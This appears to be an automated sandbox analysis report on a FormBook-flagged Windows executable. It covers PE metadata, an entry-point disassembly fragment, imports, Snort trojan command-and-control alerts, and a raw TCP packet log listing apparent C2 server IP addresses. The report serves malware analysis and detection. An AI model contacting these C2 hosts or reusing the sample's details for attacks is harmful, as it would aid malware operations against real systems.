                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                        DLL Characteristics:
                                                                                                                        Time Stamp:0x58DD4808 [Thu Mar 30 18:01:44 2017 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:0db4e1fdede6848b7d67f260c767df5d

                                                                                                                        Authenticode Signature

                                                                                                                        Signature Valid:false
                                                                                                                        Signature Issuer:E=Knyste6@Eximiousne3.BRY, CN=Siphonalet4, OU=Dehumanise5, O=octocorall, L=Myomatous7, S=FAHLORE, C=TD
                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                        Error Number:-2146762487
                                                                                                                        Not Before, Not After
                                                                                                                        • 24/11/2021 12:22:16 24/11/2022 12:22:16
                                                                                                                        Subject Chain
                                                                                                                        • E=Knyste6@Eximiousne3.BRY, CN=Siphonalet4, OU=Dehumanise5, O=octocorall, L=Myomatous7, S=FAHLORE, C=TD
                                                                                                                        Version:3
                                                                                                                        Thumbprint MD5:3EA4D95D319B3BCDDF3A916A0A7F25DF
                                                                                                                        Thumbprint SHA-1:827D80430EC06C8058A205E7E710FFF3EB2A03DE
                                                                                                                        Thumbprint SHA-256:7824D156B89CF1BF25F923BECB9DCE0EF3F49C821D270075A626DE65497E77AD
                                                                                                                        Serial:00

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        push 00402510h
                                                                                                                        call 00007F0798A3AAD5h
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        xor byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        cmp byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        xlatb
                                                                                                                        lds ebx, edx
                                                                                                                        mov bl, 87h
                                                                                                                        fisttp dword ptr [edi-6Ch]
                                                                                                                        push ebp
                                                                                                                        inc ecx
                                                                                                                        dec eax
                                                                                                                        jmp far 0000h : 00DCC60Ah
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [ecx], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax+45h], dl
                                                                                                                        push edx
                                                                                                                        dec ecx
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        dec esp
                                                                                                                        xor dword ptr [eax], eax
                                                                                                                        sub eax, B60C4E3Eh
                                                                                                                        test eax, B24EE131h
                                                                                                                        cmp eax, 043AB174h
                                                                                                                        imul ebp, dword ptr [edx], 2411205Eh
                                                                                                                        push ss
                                                                                                                        pushad
                                                                                                                        bound eax, dword ptr [ebp-64h]
                                                                                                                        mov byte ptr [esi], FFFFFF8Ah
                                                                                                                        push ds

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1f1440x28.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000xf77.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x220000x1458
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x13c.text
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x1e6c00x1f000False0.523012222782data6.34448502446IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x200000x1a400x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x220000xf770x1000False0.367431640625data4.13632936066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        CUSTOM0x22d3b0x23cASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                        CUSTOM0x22d180x23ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                        RT_ICON0x224700x8a8data
                                                                                                                        RT_GROUP_ICON0x2245c0x14data
                                                                                                                        RT_VERSION0x221700x2ecdataEnglishUnited States

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        MSVBVM60.DLL__vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaCyI2, __vbaStrCmp, DllFunctionCall, __vbaVarLateMemSt, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaI4Cy, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                                                                        Version Infos

                                                                                                                        DescriptionData
                                                                                                                        Translation0x0409 0x04b0
                                                                                                                        LegalCopyrightMon Frak
                                                                                                                        InternalNameUNDERWR
                                                                                                                        FileVersion1.00
                                                                                                                        CompanyNameMon Frak
                                                                                                                        LegalTrademarksMon Frak
                                                                                                                        CommentsMon Frak
                                                                                                                        ProductNameMon Frak
                                                                                                                        ProductVersion1.00
                                                                                                                        FileDescriptionMon Frak
                                                                                                                        OriginalFilenameUNDERWR.exe

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        11/25/21-12:56:13.220035TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981580192.168.11.20104.21.76.223
                                                                                                                        11/25/21-12:56:13.220035TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981580192.168.11.20104.21.76.223
                                                                                                                        11/25/21-12:56:13.220035TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981580192.168.11.20104.21.76.223
                                                                                                                        11/25/21-12:56:34.061801TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981780192.168.11.20164.155.212.139
                                                                                                                        11/25/21-12:56:34.061801TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981780192.168.11.20164.155.212.139
                                                                                                                        11/25/21-12:56:34.061801TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981780192.168.11.20164.155.212.139
                                                                                                                        11/25/21-12:56:39.949611TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981880192.168.11.20172.120.157.187
                                                                                                                        11/25/21-12:56:39.949611TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981880192.168.11.20172.120.157.187
                                                                                                                        11/25/21-12:56:39.949611TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981880192.168.11.20172.120.157.187
                                                                                                                        11/25/21-12:56:50.191875TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981980192.168.11.203.64.163.50
                                                                                                                        11/25/21-12:56:50.191875TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981980192.168.11.203.64.163.50
                                                                                                                        11/25/21-12:56:50.191875TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981980192.168.11.203.64.163.50
                                                                                                                        11/25/21-12:57:19.581032ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                        11/25/21-12:57:48.440285TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982380192.168.11.20172.67.164.153
                                                                                                                        11/25/21-12:57:48.440285TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982380192.168.11.20172.67.164.153
                                                                                                                        11/25/21-12:57:48.440285TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982380192.168.11.20172.67.164.153
                                                                                                                        11/25/21-12:57:53.969955TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982480192.168.11.203.64.163.50
                                                                                                                        11/25/21-12:57:53.969955TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982480192.168.11.203.64.163.50
                                                                                                                        11/25/21-12:57:53.969955TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982480192.168.11.203.64.163.50
                                                                                                                        11/25/21-12:58:24.837935TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982680192.168.11.203.64.163.50
                                                                                                                        11/25/21-12:58:24.837935TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982680192.168.11.203.64.163.50
                                                                                                                        11/25/21-12:58:24.837935TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982680192.168.11.203.64.163.50
                                                                                                                        11/25/21-12:58:46.492771ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                        11/25/21-12:58:54.460181ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                        11/25/21-12:59:11.009465ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                        11/25/21-12:59:26.513558ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                        11/25/21-13:00:06.831291ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.201.1.1.1
                                                                                                                        11/25/21-13:00:30.897806ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.201.1.1.1
                                                                                                                        11/25/21-13:00:58.958116TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983680192.168.11.203.64.163.50
                                                                                                                        11/25/21-13:00:58.958116TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983680192.168.11.203.64.163.50
                                                                                                                        11/25/21-13:00:58.958116TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983680192.168.11.203.64.163.50
                                                                                                                        11/25/21-13:01:05.901849ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                        11/25/21-13:01:29.228115ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                        11/25/21-13:01:53.595063TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984380192.168.11.2034.102.136.180
                                                                                                                        11/25/21-13:01:53.595063TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984380192.168.11.2034.102.136.180
                                                                                                                        11/25/21-13:01:53.595063TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984380192.168.11.2034.102.136.180
                                                                                                                        11/25/21-13:01:53.704468TCP1201ATTACK-RESPONSES 403 Forbidden804984334.102.136.180192.168.11.20

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 25, 2021 12:54:53.951297998 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:53.951342106 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:53.951580048 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:53.963933945 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:53.963953972 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.201822996 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.202085018 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.320291042 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.320346117 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.320997000 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.321127892 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.330709934 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.371917963 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.442766905 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.442869902 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.442977905 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.443044901 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.443062067 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.443084002 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.443098068 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.443258047 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.553422928 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.553611994 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.553674936 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.553746939 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.554040909 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.664602995 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.664783001 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.664937019 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.664968967 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.664994001 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.665100098 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.665122986 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.665143967 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.665154934 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.665286064 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.665311098 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.665334940 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.665456057 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.665483952 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.665493965 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.665503025 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.665663004 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.706569910 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.706798077 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.706840038 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.706851006 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.776314974 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.776477098 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.776499033 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.776556015 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.776578903 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.776724100 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.776803017 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.776829958 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.776972055 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.777164936 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.777213097 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.777225018 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.777359962 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.777489901 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.816994905 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.817177057 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.817222118 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.887572050 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.887908936 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.888024092 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.888269901 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.888319969 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.888622999 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.888643980 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.888664007 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.888896942 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.888992071 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.889079094 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.889301062 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.889318943 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.889348030 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.889451981 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.889509916 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.889736891 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.889928102 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.890124083 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.927294970 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:54.927547932 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:54.927581072 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:55.000137091 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:55.000278950 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:55.000294924 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:55.000313044 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:55.000415087 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:55.000448942 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:55.000487089 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:55.000576973 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:55.000770092 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:55.000848055 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:55.000899076 CET44349812107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 12:54:55.000907898 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:54:55.001101017 CET49812443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 12:56:13.210881948 CET4981580192.168.11.20104.21.76.223
                                                                                                                        Nov 25, 2021 12:56:13.219788074 CET8049815104.21.76.223192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:13.219952106 CET4981580192.168.11.20104.21.76.223
                                                                                                                        Nov 25, 2021 12:56:13.220035076 CET4981580192.168.11.20104.21.76.223
                                                                                                                        Nov 25, 2021 12:56:13.228821039 CET8049815104.21.76.223192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:13.382391930 CET8049815104.21.76.223192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:13.382405996 CET8049815104.21.76.223192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:13.382580996 CET8049815104.21.76.223192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:13.382910967 CET4981580192.168.11.20104.21.76.223
                                                                                                                        Nov 25, 2021 12:56:13.382925987 CET4981580192.168.11.20104.21.76.223
                                                                                                                        Nov 25, 2021 12:56:13.382930040 CET4981580192.168.11.20104.21.76.223
                                                                                                                        Nov 25, 2021 12:56:28.520108938 CET4981680192.168.11.2081.2.194.128
                                                                                                                        Nov 25, 2021 12:56:28.546658993 CET804981681.2.194.128192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:28.546880007 CET4981680192.168.11.2081.2.194.128
                                                                                                                        Nov 25, 2021 12:56:28.546938896 CET4981680192.168.11.2081.2.194.128
                                                                                                                        Nov 25, 2021 12:56:28.573829889 CET804981681.2.194.128192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:28.576894045 CET804981681.2.194.128192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:28.576960087 CET804981681.2.194.128192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:28.577003002 CET804981681.2.194.128192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:28.577404022 CET4981680192.168.11.2081.2.194.128
                                                                                                                        Nov 25, 2021 12:56:28.577503920 CET4981680192.168.11.2081.2.194.128
                                                                                                                        Nov 25, 2021 12:56:28.604295015 CET804981681.2.194.128192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:33.893564939 CET4981780192.168.11.20164.155.212.139
                                                                                                                        Nov 25, 2021 12:56:34.061499119 CET8049817164.155.212.139192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:34.061731100 CET4981780192.168.11.20164.155.212.139
                                                                                                                        Nov 25, 2021 12:56:34.061800957 CET4981780192.168.11.20164.155.212.139
                                                                                                                        Nov 25, 2021 12:56:34.229708910 CET8049817164.155.212.139192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:34.568326950 CET4981780192.168.11.20164.155.212.139
                                                                                                                        Nov 25, 2021 12:56:34.717901945 CET8049817164.155.212.139192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:34.717962980 CET8049817164.155.212.139192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:34.718271017 CET4981780192.168.11.20164.155.212.139
                                                                                                                        Nov 25, 2021 12:56:34.718367100 CET4981780192.168.11.20164.155.212.139
                                                                                                                        Nov 25, 2021 12:56:34.727014065 CET8049817164.155.212.139192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:34.727236986 CET4981780192.168.11.20164.155.212.139
                                                                                                                        Nov 25, 2021 12:56:34.736188889 CET8049817164.155.212.139192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:34.736525059 CET4981780192.168.11.20164.155.212.139
                                                                                                                        Nov 25, 2021 12:56:39.787911892 CET4981880192.168.11.20172.120.157.187
                                                                                                                        Nov 25, 2021 12:56:39.949301004 CET8049818172.120.157.187192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:39.949527025 CET4981880192.168.11.20172.120.157.187
                                                                                                                        Nov 25, 2021 12:56:39.949610949 CET4981880192.168.11.20172.120.157.187
                                                                                                                        Nov 25, 2021 12:56:40.114429951 CET8049818172.120.157.187192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:40.114500999 CET8049818172.120.157.187192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:40.114938974 CET4981880192.168.11.20172.120.157.187
                                                                                                                        Nov 25, 2021 12:56:40.115042925 CET4981880192.168.11.20172.120.157.187
                                                                                                                        Nov 25, 2021 12:56:40.276146889 CET8049818172.120.157.187192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:50.179936886 CET4981980192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:56:50.191602945 CET80498193.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:50.191821098 CET4981980192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:56:50.191874981 CET4981980192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:56:50.203303099 CET80498193.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:50.203358889 CET80498193.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:50.203393936 CET80498193.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:50.203674078 CET4981980192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:56:50.203726053 CET4981980192.168.11.203.64.163.50
                                                                                                                        Nov 25, 2021 12:56:50.215117931 CET80498193.64.163.50192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:05.760725975 CET4982080192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:57:06.036005020 CET8049820203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:06.036355019 CET4982080192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:57:06.036454916 CET4982080192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:57:06.312331915 CET8049820203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:06.315325022 CET8049820203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:06.315699100 CET4982080192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:57:06.315802097 CET4982080192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 12:57:06.588951111 CET8049820203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:38.234535933 CET4982280192.168.11.2088.99.22.5
                                                                                                                        Nov 25, 2021 12:57:38.249697924 CET804982288.99.22.5192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:38.250005960 CET4982280192.168.11.2088.99.22.5
                                                                                                                        Nov 25, 2021 12:57:38.250077963 CET4982280192.168.11.2088.99.22.5
                                                                                                                        Nov 25, 2021 12:57:38.265129089 CET804982288.99.22.5192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:38.265187025 CET804982288.99.22.5192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:38.265223980 CET804982288.99.22.5192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:38.265492916 CET4982280192.168.11.2088.99.22.5
                                                                                                                        Nov 25, 2021 12:57:38.265538931 CET4982280192.168.11.2088.99.22.5
                                                                                                                        Nov 25, 2021 12:57:38.280482054 CET804982288.99.22.5192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:48.430843115 CET4982380192.168.11.20172.67.164.153
                                                                                                                        Nov 25, 2021 12:57:48.440013885 CET8049823172.67.164.153192.168.11.20
